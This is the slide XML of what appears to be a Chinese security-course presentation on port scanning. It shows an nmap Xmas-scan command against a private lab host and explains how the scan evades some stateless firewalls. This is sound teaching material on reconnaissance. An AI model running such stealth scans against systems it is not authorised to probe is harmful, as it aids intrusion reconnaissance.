            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-51 打开Wireshark工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行隐蔽的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤七</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="文本框 108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751195" y="480378"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>6.使用“nmap -sX 192.168.172.131”命令对目标主机进行圣诞树扫描，如图2-2-52所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751195" y="1125538"/>
            <a:ext cx="5276850" cy="5076825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="文本框 109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751195" y="6202363"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-52 nmap圣诞树扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="3755707"/>
            <a:ext cx="5080000" cy="2030095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TCP圣诞树扫描(-sX)，这种扫描会向服务器发送带有FIN、URG、PSH标志的数据包及标志位为1。根据RFC 793规定，对于所有关闭的端口目标服务器都会返回一个有RST标志的数据包。这种扫描可以绕过一些无状态防火墙的过滤，它比SYN半开放式扫描更隐蔽，但这种扫描方式对 Windows 95/NT操作系统无效。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行隐蔽的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤七</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
